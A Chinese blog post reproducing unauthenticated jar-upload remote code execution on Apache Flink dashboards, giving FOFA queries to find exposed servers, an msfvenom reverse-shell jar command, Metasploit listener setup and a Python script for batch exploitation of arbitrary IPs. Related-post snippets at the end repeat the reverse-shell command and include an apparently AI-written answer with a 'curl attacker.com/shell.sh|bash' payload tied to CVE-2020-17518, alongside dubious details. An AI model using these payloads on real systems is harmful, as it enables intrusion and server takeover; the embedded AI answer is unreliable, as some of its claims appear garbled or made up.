Apache Flink 未授权访问+远程代码执行

最新推荐文章于 2025-06-17 11:17:35 发布
原创 最新推荐文章于 2025-06-17 11:17:35 发布 · 1.2k 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#Apache Flink #未授权访问 #远程代码执行

本文介绍Apache Flink中存在的远程代码执行漏洞复现过程。该漏洞允许攻击者上传恶意Jar包并执行远程代码,影响版本<=1.9.1。文章详细记录了使用MSF生成木马、设置监听及反弹Shell的步骤。

0x00 前言

@Adminxe 今天胖胖表哥突然扔来一个复现,那俺得瞧瞧,正好写个博客划划水,然后就引发了下面一些列的操作以及你想看到的,以及和你不想看到的文字。之前就有大佬复现过,毕竟水文和复现学习,那就来一波吧!最可恶的是,今天的MC兄没有请客喝啵啵奶茶,必须点名批评一下!

从现在fofa的搜索量来看,基本也就是国内Apache Flink 存在1500左右的站点。

有安全研究员公开了一个Apache Flink的任意Jar包上传导致远程代码执行的漏洞,影响范围:
<= 1.9.1(最新版本)
此次复现就是通过版本Version: 1.10.1进行复现利用。

0x01 FOFA语句

app="Apache-Flink"
app="Apache‐Flink" && country="CN"
app="Apache‐Flink" && country="CN" && region="HK"

0x02 漏洞复现

1、这里随便搞个站打开进行复现,打开以后就张这样子。

点击Submit New Job翻译:文件上传

2、打开MSF 生成一个 jar 木马

msfvenom ‐p java/meterpreter/reverse_tcp LHOST=**.***.59.61  LPORT=4444 ‐f
 jar > testone.jar

3、点击 Add 上传 jar 文件

4、设置监听端口

msf5 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf5 exploit(multi/handler) > set payload java/shell/reverse_tcp 
payload => java/shell/reverse_tcp
msf5 exploit(multi/handler) > set lhost XX.XXX.XX.61
lhost => XX.XXX.XX.61
msf5 exploit(multi/handler) > set lport 4444
lport => 4444
msf5 exploit(multi/handler) > run

5、点击下 submit

6、反弹shell成功

0x03 批量化测试脚本

import sys
import json
import requests

def flink_check(vuln_url):
    r = requests.get(vuln_url)
    if r.status_code == 200 and len(r.content) > 0:
        print(vuln_url + 'may has Apache Flink Web Dashboard RCE vul')
        upload_jar(vuln_url)

    else:
        print(vuln_url + 'does not have Apache Flink Web Dashboard RCE vul')


def upload_jar(vuln_url):
    upload_url = vuln_url + '/upload'
    files = {
        'file':open(sys.argv[2],'rb')
    }
    r = requests.post(upload_url, files=files)
    if r.status_codes== 200 and 'filename' in r.content:
        print('upload success')
        json_str = json.loads(r.content)
        filename = json_str['filename'].split('/')[-1]
        submit_jar(vuln_url,filename)

    else:
        print('faild')

def submit_jar(vuln_url,filename):
    submit_url = vuln_url + filename + '/run?entry-class=metasploit.Payload'
    url = vuln_url[:-4]
    headers = {
    'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:55.0) Gecko/20100101 Firefox/55.0',
    'Accept': 'application/json, text/plain, */*',
    'Accept-Language': 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',
    'Accept-Encoding': 'gzip, deflate',
    'Content-Type': 'application/json',
    'Referer': '%s' % url,
    'Content-Length': '123',
    'Connection': 'close'
    }
    payload = {
        "entryClass":"metasploit.Payload",
        "parallelism": 0,
        "programArgs": 0,
        "savepointPath": 0,
        "allowNonRestoredState": 0
    }

    r = requests.post(submit_url, headers=headers, data=payload, proxies=proxies)
    if r.status_code == 500 and 'org.apache.flink.client.program.ProgramInvocationException' in r.content:
        print("[+] Poc Send Success!\n")
        # print 'msfconsole  -q  -x "use exploit/multi/handler;set payload java/meterpreter/reverse_tcp;set lhost 10.10.20.166;set lport 8989;run"\n'
    else:
        print("[+] Poc Send Fail!")

"""
only for dected:
def POC_check(vuln_url):
    res = requests.get(url=vuln_url, timeout=3)
    data = {
        'msg': res.json(),
        'state': 1,
        'url': url,
    }
"""


if __name__ == '__main__':
    if len(sys.argv) == 3:
        ip = sys.argv[1]
        port = sys.argv[2]
        url = 'http://' + ip + ':' + port
        vuln_url = url + '/jars'
        flink_check(vuln_url=vuln_url)

    elif len(sys.argv) == 2:
        ip = sys.argv[1]
        port = '8081'
        url = 'http://' + ip + ':' + port
        vuln_url = url + '/jars'
        flink_check(vuln_url=vuln_url)

0x04 参考资料

  • https://mp.weixin.qq.com/s/ArYCF4jjhy6nkY4ypib-Ag
  • https://flink.apache.org/downloads.html

转载请注明:Adminxe's Blog » Apache Flink 未授权访问+远程代码执行

Apache Flink (最新版本) 远程代码执行
「我唯一会的和擅长的只有网络安全,如果我不能在我最擅长的事情上取得成功,那么我根本不知道,我的人生还有什么意义。」
05-04 1089
路虽远,行则将至;事虽难,做则必成
Apache Flink 未授权远程代码执行提权(实战)
失心少年
12-04 1486
1、fofa 搜索 app=“Apache-Flink” 可以看到有上千个 2、生成木马 下面展示一些 。 msfvenom -p java/meterpreter/reverse_tcp LHOST=47.103.79.70 LPORT=4444 -f jar > rce.jar 3、打开msf 进行如下配置,并进行监听 下面展示一些 。 3、上传刚才生成的木马,并执行 4、看到shell已经反弹回来 5、通过id 、 whoami 、cat /etc/passwd等命令查看当前用户及权
Apache-Flink未授权访问高危漏洞修复
weixin_38255219的博客
07-12 3757
由于flink没有鉴权的设置,使用使用 htpasswd 工具+服务器系统防火墙设置,才能禁用默认对外访问的8081端口,使用用户名+密码实现安全验证登录flink web ui。
[漏洞复现]Apache Flink未授权访问+远程代码命令执行
cj_Hydra's Blog
10-24 3195
前言: 近日,有安全研究员公开了一个Apache Flink的任意Jar包上传导致远程代码执行的漏洞,影响范围:<= 1.9.1(最新版本) 但是作者通过测试在版本Version: 1.11.2也是受影响的,此次复现就是通过版本Version: 1.11.2进行复现利用。 漏洞复现: 首先通过msfveon生成jar包,命令: msfvenom -p java/meterpreter/reverse_tcp LHOST=公网IP地址 LPORT=监听端口 -f jar > rce.jar 然
Apache Flink未授权访问-远程代码命令执行-复现
thelostworld
10-24 1012
​好久没更新了,今天趁1024更新一篇,最近工作中遇到这个漏洞,今天自己来做一下这个漏洞复现。Apache Flink未授权访问-远程代码命令执行-复现一、漏洞简介Apache Flink Dashboard默认没有用户权限认证。攻击者可以通过未授权Flink Dashboard控制台,直接上传木马jar包,可远程执行任意系统命令获取服务器权限,风险极大。二、影响版本Apache Flink &...
Apache Flink漏洞复现(未授权访问&上传jar包getshell)
qq_43244584的博客
01-26 7101
Apache Flink漏洞复现(未授权访问&上传jar包getshell) 一、Flink简介 Flink核心是一个流式的数据流执行引擎,其针对数据流的分布式计算提供了数据分布、数据通信以及容错机制等功能。基于流执行引擎,Flink提供了诸多更高抽象层的API以便用户编写分布式任务。 二、漏洞介绍 ​ Apache Flink Dashboard默认没有用户权限认证 ​ 攻击者可以通过未授权Flink Dashboard控制台 ​ 直接上传木马jar包 ​ 可远程执行任意系统命令获取服务器权限
Apache Flink 未授权访问+远程代码执行.pdf
04-30
### Apache Flink 未授权访问远程代码执行漏洞解析及防范 #### 一、漏洞概述 **Apache Flink**是一款高性能、分布式、流处理引擎,它支持事件驱动的数据流处理和批处理作业。由于其出色的性能表现,在大数据处理...
【漏洞修复】修复 Apache Flink Web Dashboard 未授权访问远程命令执行漏洞
RobinWang的博客
01-15 9048
【漏洞修复】修复 Apache Flink Web Dashboard 未授权访问远程命令执行漏洞 介绍 攻击者通过Flink Web Dashboard上传含有恶意代码的jar包进行攻击,中招会使服务器占满CPU沦为挖矿机,非常猖獗 通过反编译得到的恶意代码: package com.example; import java.io.IOException; public class Mai...
Apache Flink未授权漏洞学习
最新发布
weixin_42051376的博客
06-17 1584
Apache Flink存在严重未授权访问漏洞(CVE-2020-17518/17519),攻击者可利用Web Dashboard(默认8081端口)无需认证上传恶意JAR文件或构造路径遍历Payload,实现远程代码执行(RCE)或敏感文件读取。漏洞影响版本包括1.5.1-1.11.2,利用工具如Metasploit可轻易获取服务器Root权限。修复方案包括升级至1.11.3+版本、启用身份认证、限制网络访问及关闭JAR上传功能等。该漏洞风险极高,运维人员需立即排查并加固相关系统。
Apache-flink 未授权访问任意jar包上传反弹shell.MD
04-12
Apache-flink 未授权访问任意jar包上传反弹shell
Apache Flink 未授权远程代码执行检查
weixin_42299610的博客
06-07 2510
Apache Flink 未授权远程代码执行检查
2020-10-24Apache Flink未授权访问-远程代码命令执行-复现
thelostworld
10-24 1263
​好久没更新了,今天趁1024更新一篇,最近工作中遇到这个漏洞,今天自己来做一下这个漏洞复现。 Apache Flink未授权访问-远程代码命令执行-复现 一、漏洞简介 Apache Flink Dashboard默认没有用户权限认证。攻击者可以通过未授权Flink Dashboard控制台,直接上传木马jar包,可远程执行任意系统命令获取服务器权限,风险极大。 二、影响版本 Apache Flink <= 1.9.1(最新版本) 三、漏洞复现 1、生成反弹jar包 msfv..
flinkdashboard未授权
someInNeed的博客
10-16 2234
访问 http://172.16.150.xx:8084。然后目录在/usr/local/nginx。flinkwebui 增加账号密码。添加配置完成以后,重启nginx,修改flink.conf。配置nginx.conf。
Apache Flink任意Jar包上传导致远程代码执行漏洞复现
Heytoo的博客
06-19 811
0x00 简介 Apache Flink是由Apache软件基金会开发的开源流处理框架,其核心是用Java和Scala编写的分布式流数据流引擎。Flink以数据并行和流水线方式执行任意流数据程序,Flink的流水线运行时系统可以执行批处理和流处理程序。 0x01 Flink应用场景 优化电子商务的实时搜索结果:阿里巴巴的所有基础设施团队使用flink实时更新产品细节和库存信息,为用户提供更高的关联性。 针对数据分析团队提供实时流处理服务:flink通过flink-powered数据分析平台提供实时数
getshell之Apache Flink 未授权访问+远程代码执行
MoCoCN的博客
11-12 1009
@[MoCo](getshell之Apache Flink 未授权访问+远程代码执行) 0x00前言 又是领导不在的一天,今天兄弟们就是天,随着工作的时间越来越久对知识的渴望也越来越强大,最近几天在看反弹shell的一些文章,也学习到了一些反弹shell技巧和姿势,由于环境的问题,暂不能记录文本,虽说都是一些基本的吧,慢慢来嘛,看着文章,吐槽的国内某知名的培训机构,努力的汲取知识,看着看着就累了,有点看不动了,但是还是想学,于是决定去看看adminxe大佬的博客上看看有没有发布新的文章,看见大佬昨天发布了一
攻击未授权访问Flink 集群
3569
08-19 873
Flink 是一个针对流数据和批数据的分布式处理引擎,与 Storm 一起广泛应用于分布式实时计算场景中,且在某些场景下 Flink 性能要优于 Storm。然而 Flink 默认提供的 Web UI 却不支持鉴权,这就引发了非常明显的未授权问题。 Flink Web UI 在 macOS 上简单安装一个单节点 Flink,直接使用 Homebrew。 brew install apac...
【CVE】CVE-2020-17518 & CVE-2020-17519:Flink 任意文件上传 & 未授权访问
边扯边淡
05-09 3074
起序:漏扫完看报告的时候发现的,复现学习一下。 一、靶场环境 使用的是 github 上的 vulhub 环境。因为 Flink 中的 CVE-2020-17518 和 CVE-2020-17519 在 Flink/1.11.2 版本都存在。 vulhub:https://github.com/vulhub/vulhub 1、漏洞描述:任意文件上传 & 未授权访问 CVE 编号 名称 危害 CVE-2020-17518 任意文件上传 应用系统在文件上传功能处对用户上传.
Apache Flink任意jar包上传导致远程代码执行 漏洞处理
专注网络安全、Linux、K8s等技术分享,愿你在云计算运维领域不断进阶,欢迎随时交流。
05-14 822
Apache Flink是一个用于分布式流和批处理数据的开放源码平台。Flink的核心是一个流数据流引擎,它为数据流上的分布式计算提供数据分发、通信和容错功能。Flink在流引擎之上构建批处理,覆盖本地迭代支持、托管内存和程序优化。使用htpasswd生成用户名密码文件,然后结合nginx配置,为Flink自带的无账号密码的webUI界面添加安全访问控制。主要步骤包括安装工具,创建用户认证文件,以及调整nginx的配置设置。由于Flink自带的web UI界面没有账号密码,需要通过nginx实现该效果。
apache flink dashboard getshell
04-03
<think>好的,我现在需要处理用户关于Apache Flink Dashboard的安全漏洞和获取Shell方法的查询。首先,用户提到了Apache APISIX的默认密钥漏洞(CVE-2020-13945)作为参考,这可能暗示他们关注的是默认配置或认证问题。同时,用户引用了其他中间件如IIS、Apache、Tomcat、Nginx的常见搭配,这可能说明他们想了解不同服务器的漏洞利用方式。另外,用户还提到了PHP中字符串连接触发的__toString方法,这可能与反序列化漏洞有关。 首先,我需要确认Apache Flink Dashboard是否存在已知的安全漏洞。查阅资料发现,Apache Flink在1.9.1及之前版本存在未授权访问导致远程代码执行(RCE)的漏洞,特别是通过JobManager的Web界面提交恶意作业。此外,另一个漏洞CVE-2020-17519涉及文件上传和路径遍历,允许覆盖任意文件。还有CVE-2020-17518是REST API未正确处理用户输入导致的RCE。这些漏洞可能允许攻击者获取Shell权限。 接下来,用户可能想知道如何利用这些漏洞。例如,对于未授权访问,攻击者可能直接上传恶意Jar文件执行代码。路径遍历漏洞则可能通过修改文件上传路径来覆盖关键系统文件。而REST API的漏洞可能需要构造特定的HTTP请求来触发命令执行。 另外,需要考虑用户提供的引用内容。例如,引用[1]中的默认密钥漏洞可能提示检查Flink是否有默认凭据,但根据现有知识,Flink默认不启用认证,所以未授权访问更常见。引用[3]的反序列化问题可能不直接适用,但需要确认Flink是否有反序列化点可能被利用。 用户的需求是寻找安全漏洞或获取Shell的方法,因此需要详细说明漏洞利用步骤,同时提醒安全建议,如升级版本、配置认证、网络隔离等。确保回答结构清晰,分点列出漏洞和对应方法,并附上参考资料。 最后,生成相关问题,涵盖漏洞列表、防护措施、与类似中间件漏洞的对比,以及如何检测是否受影响。这有助于用户全面了解Flink的安全状况。</think>关于Apache Flink Dashboard的安全漏洞及获取Shell的方法,以下是已知的漏洞类型和利用方式的技术分析: ### 一、Apache Flink 已知高危漏洞 1. **未授权访问RCE漏洞(Cli模式)** - **影响版本**:1.9.1及以下 - **利用原理**:Dashboard默认未开启认证,攻击者可通过Web界面直接提交恶意Jar包实现代码执行 - **利用步骤**: ```bash curl -X POST -H "Expect:" -F "jarfile=@exploit.jar" http://flink-server:8081/jars/upload curl -X POST http://flink-server:8081/jars/{jar_id}/run ``` 2. **路径遍历+文件覆盖漏洞(CVE-2020-17519)** - **影响版本**:1.5.1-1.11.2 - **利用效果**:通过恶意文件名构造路径遍历,覆盖服务器任意文件 ```http POST /jars/upload HTTP/1.1 Content-Disposition: form-data; name="jarfile"; filename="../../tmp/evil.config" ``` 3. **REST API命令注入(CVE-2020-17518)** - **触发点**:JobManager的REST接口 - **Payload示例**: ```http GET /jars/upload?addr=127.0.0.1|bash+-c+"curl+attacker.com/shell.sh|bash" HTTP/1.1 ``` ### 二、防护建议 1. 升级到1.11.3+版本并启用HTTPS 2. 在`flink-conf.yaml`中配置认证: ```yaml security.kerberos.login.use-ticket-cache: true security.ssl.enabled: true ``` 3. 通过防火墙限制Dashboard的访问源IP[^1] ### 三、漏洞检测方法 使用nmap检测开放端口: ```bash nmap -p 8081,6123 --script flink-detect.nse <target_ip> ```
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Adminxe

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值